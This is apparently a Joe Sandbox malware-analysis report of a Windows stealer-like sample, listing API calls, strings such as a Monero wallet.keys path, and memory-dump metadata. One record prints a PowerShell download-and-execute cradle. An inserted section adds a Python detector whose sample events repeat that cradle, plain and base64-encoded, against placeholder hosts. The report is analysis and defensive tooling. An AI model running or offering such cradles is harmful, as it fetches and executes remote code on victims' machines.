                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: fd4d995eccb5f7febc0438f4e63721bae5839003d18f5bab0f75f9886988ac1b
                          • Instruction ID: 4b81ad294bfe91982021bec73afa36f379f22b3641244d6a51c758f1099f28df
                          • Opcode Fuzzy Hash: fd4d995eccb5f7febc0438f4e63721bae5839003d18f5bab0f75f9886988ac1b
                          • Instruction Fuzzy Hash: 820121F5A04208BFDB00DBA5DC4DF79B7B8EB88701F144169FA08EB290E6B09904CF51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0188BD08,00000000,00020119,00CC76B9), ref: 00CC775B
                          • RegQueryValueExA.ADVAPI32(00CC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00CC777A
                          • RegCloseKey.ADVAPI32(00CC76B9), ref: 00CC7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: bed0ff1e996b4f7af1a7050402c47b3022889089b75e27dc943b8ce4f8ccae9b
                          • Instruction ID: 48a78e34300c836708ac4106016e4967e00ad945b711bb6f9e345628d0cdd0dd
                          • Opcode Fuzzy Hash: bed0ff1e996b4f7af1a7050402c47b3022889089b75e27dc943b8ce4f8ccae9b
                          • Instruction Fuzzy Hash: A60121F5A40208BFD710DBE5DC4AFBEB7B8EB88700F104169FA09AB281D6B06604CB51
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                          • LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 5e7f1e8b176968bb835f52168a53cb430752372c4dcfb7789ac01f9e3ece3a45
                          • Instruction ID: 2ace9821d659c722d9419afc8cd1bcb006ea11d3c8910edb18f6a2922f617f78
                          • Opcode Fuzzy Hash: 5e7f1e8b176968bb835f52168a53cb430752372c4dcfb7789ac01f9e3ece3a45
                          • Instruction Fuzzy Hash: 31312CB4A00209EFDB14CF95C885FEE77B5FF88740F108158E915AB290D778AA45DFA1
                          APIs
                          • lstrcat.KERNEL32(?,0189E390), ref: 00CC47DB
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4801
                          • lstrcat.KERNEL32(?,?), ref: 00CC4820
                          • lstrcat.KERNEL32(?,?), ref: 00CC4834
                          • lstrcat.KERNEL32(?,0188B860), ref: 00CC4847
                          • lstrcat.KERNEL32(?,?), ref: 00CC485B
                          • lstrcat.KERNEL32(?,0189D648), ref: 00CC486F
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CC8D90: GetFileAttributesA.KERNEL32(00000000,?,00CB1B54,?,?,00CD564C,?,?,00CD0E1F), ref: 00CC8D9F
                            • Part of subcall function 00CC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CC4580
                            • Part of subcall function 00CC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00CC4587
                            • Part of subcall function 00CC4570: wsprintfA.USER32 ref: 00CC45A6
                            • Part of subcall function 00CC4570: FindFirstFileA.KERNEL32(?,?), ref: 00CC45BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 5440d8bed88897a06b2fdfd8333e46e7bd633eb589d5eb386dd924c1cdcd6a1c
                          • Instruction ID: ed625653c53c1cd4ea091483d6e8935dedda28fb2d99f8984d37d93e05ec3523
                          • Opcode Fuzzy Hash: 5440d8bed88897a06b2fdfd8333e46e7bd633eb589d5eb386dd924c1cdcd6a1c
                          • Instruction Fuzzy Hash: A63152B29002085BCB14FBA0DC8AFFA7378AB58700F444599F719A6091EEB4978DDB95
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC2D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00CC2CC4
                          • ')", xrefs: 00CC2CB3
                          • <, xrefs: 00CC2D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00CC2D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 729f6934da46ff17cf62e678059661bb4e269cd6e82acdb7b0159d348fbbe2bd
                          • Instruction ID: ab3420beb3855e6f726ef401b5ee1919fc97865a3bbdc472fa12a2305b4cc24c
                          • Opcode Fuzzy Hash: 729f6934da46ff17cf62e678059661bb4e269cd6e82acdb7b0159d348fbbe2bd
                          • Instruction Fuzzy Hash: 1541EA71C1020C9BDB14EBA1C89AFEDBB74AF10304F50412DE116AA1D2EF742A4AEF91
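The four strings and the ShellExecuteEx call in the record above are the parts of a PowerShell download cradle: the sample concatenates powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')" around a URL and launches it, so the second stage is fetched and evaluated in memory rather than written to disk as a script file. The hard-coded SysWOW64 path is the 32-bit PowerShell host on 64-bit Windows (a 32-bit parent process gets that one); the path does not exist on a 32-bit install. The detector below is an added example written for this page, not code from the Joe Sandbox report or from the sample. It scans constructed Sysmon Event ID 1 style process-creation events, decodes an -EncodedCommand payload before matching, requires the downloader indicator plus at least one more cradle indicator so that ordinary "powershell -nop -File" administration does not fire, and extracts the staged URL for blocking. The report does not show the real stage URL, so the URLs in the sample events are placeholders under the reserved .invalid TLD.

```python
import base64
import re
from typing import Dict, List, Optional

# Added example for this page (editor's code, not from the Joe Sandbox report
# or the sample): detect the PowerShell download cradle the sample assembles
# in process-creation telemetry and pull out the staged URL.

# Base64 payload of -EncodedCommand; -e, -ec, -enc and the long form are all accepted by PowerShell.
ENC_RE = re.compile(r"(?<![\w-])-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

CRADLE_INDICATORS = [
    ("iex_or_invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("webclient_download", re.compile(r"net\.webclient|downloadstring|downloadfile", re.I)),
    ("noprofile", re.compile(r"(?<![\w-])-nop(?:rofile)?\b", re.I)),
    ("hidden_window", re.compile(r"(?<![\w-])-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", ENC_RE),
]
URL_RE = re.compile(r"""Download(?:String|File)\(\s*['"]([^'"]+)['"]""", re.I)
PS_IMAGE_RE = re.compile(r"\\(SysWOW64|System32)\\WindowsPowerShell\\v1\.0\\powershell\.exe", re.I)


def _expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand script (base64 of UTF-16LE) so the
    indicator scan sees through the encoding; leave cmdline alone if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def analyse_commandline(cmdline: str, image: str = "") -> Optional[Dict[str, object]]:
    """Return a finding for a download cradle, else None. The downloader indicator
    is mandatory and one more is required, so 'powershell -nop -File admin.ps1'
    does not fire but 'iex(...DownloadString(...))' does."""
    text = _expand_encoded(cmdline)
    hits = [name for name, rx in CRADLE_INDICATORS if rx.search(text)]
    if "webclient_download" not in hits or len(hits) < 2:
        return None
    url = URL_RE.search(text)
    host = PS_IMAGE_RE.search(image + " " + cmdline)
    return {
        "indicators": hits,
        "url": url.group(1) if url else None,
        # SysWOW64 is the 32-bit PowerShell on 64-bit Windows: a 32-bit parent launched it.
        "wow64_host": bool(host and host.group(1).lower() == "syswow64"),
    }


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the check over process-creation events and attach the parent image."""
    findings = []
    for ev in events:
        finding = analyse_commandline(ev["CommandLine"], ev.get("Image", ""))
        if finding:
            finding["parent"] = ev["ParentImage"]
            findings.append(finding)
    return findings


# Constructed Sysmon Event ID 1 style events. URLs are placeholders under the
# reserved .invalid TLD; the report does not show the real stage URL.
_ENC_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"
_ENC_B64 = base64.b64encode(_ENC_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\file.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://stage.example.invalid/update.ps1')"'''},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + _ENC_B64},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f["parent"], "->", f["url"], f["indicators"], "wow64" if f["wow64_host"] else "")
```

The two-indicator threshold is the design choice to revisit for your environment: the sample's own command line carries three (iex, the WebClient downloader, -nop), so it fires with margin, while a signed administrative script launched with -nop -File carries one and stays quiet. The parent image is kept in the finding because a non-browser, non-installer parent such as a user-profile executable spawning the SysWOW64 PowerShell is the second thing a responder will want to see.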
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00CB9F41
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 5279d02e904f8ed28032fd9f8f6af5af9d2844cf04b728e2f81b63066f02e6af
                          • Instruction ID: fb93c0b93834a7f9e0c8c6a4adf7160f698cdcb3755916ca7a0dd3eb67bafc28
                          • Opcode Fuzzy Hash: 5279d02e904f8ed28032fd9f8f6af5af9d2844cf04b728e2f81b63066f02e6af
                          • Instruction Fuzzy Hash: 94613D71A0024CAFDB24EFA4DC9AFED77B5AF44304F448018F90A5F291DB746A06DB52
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0189D808,00000000,00020119,?), ref: 00CC40F4
                          • RegQueryValueExA.ADVAPI32(?,0189E2D0,00000000,00000000,00000000,000000FF), ref: 00CC4118
                          • RegCloseKey.ADVAPI32(?), ref: 00CC4122
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4147
                          • lstrcat.KERNEL32(?,0189E2E8), ref: 00CC415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 767c3bb4ca90fa28714ce9f65801dc08ce4d12736a17d9e9f7af5629b7890ef5
                          • Instruction ID: 20241415aa42e4c60ff72ac01163c442ed8dadacd5146afd97107726d6843701
                          • Opcode Fuzzy Hash: 767c3bb4ca90fa28714ce9f65801dc08ce4d12736a17d9e9f7af5629b7890ef5
                          • Instruction Fuzzy Hash: 2A418AF69001086BDB24EBA0EC56FFE777DA788300F44855CB6195B181EA755B8CCBA2
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00CC696C
                          • sscanf.NTDLL ref: 00CC6999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CC69B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CC69C0
                          • ExitProcess.KERNEL32 ref: 00CC69DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 24fda212ddde58466cfb9ae282295da630c5ece577d9365c09871d90da02fcdc
                          • Instruction ID: d2023cdb5045a0997a0b1d6b9ef8e4f39ec3887a9719ffc6705f0204a1a624dd
                          • Opcode Fuzzy Hash: 24fda212ddde58466cfb9ae282295da630c5ece577d9365c09871d90da02fcdc
                          • Instruction Fuzzy Hash: 0D21ECB5D00208AFCF08EFE5D949AEEB7B5BF48300F04852EE41AB7250EB745609CB65
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0188BD78,00000000,00020119,?), ref: 00CC7E5E
                          • RegQueryValueExA.ADVAPI32(?,0189D5C8,00000000,00000000,000000FF,000000FF), ref: 00CC7E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00CC7E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 9f07109f34cfb0818b4ceb01bc94f344472650eae91465b4713cc3928bf4f279
                          • Instruction ID: 02de1206f44c0a2154367ee95c94cd41506dbb0e4ce345a0014016ec24ab59cc
                          • Opcode Fuzzy Hash: 9f07109f34cfb0818b4ceb01bc94f344472650eae91465b4713cc3928bf4f279
                          • Instruction Fuzzy Hash: 97116DF2A44205AFD704DB96DC49F7BBBB8EB44710F10426DF619AB280D7B45804CBA1
                          APIs
                          • StrStrA.SHLWAPI(0189E1B0,?,?,?,00CC140C,?,0189E1B0,00000000), ref: 00CC926C
                          • lstrcpyn.KERNEL32(00EFAB88,0189E1B0,0189E1B0,?,00CC140C,?,0189E1B0), ref: 00CC9290
                          • lstrlen.KERNEL32(?,?,00CC140C,?,0189E1B0), ref: 00CC92A7
                          • wsprintfA.USER32 ref: 00CC92C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmp
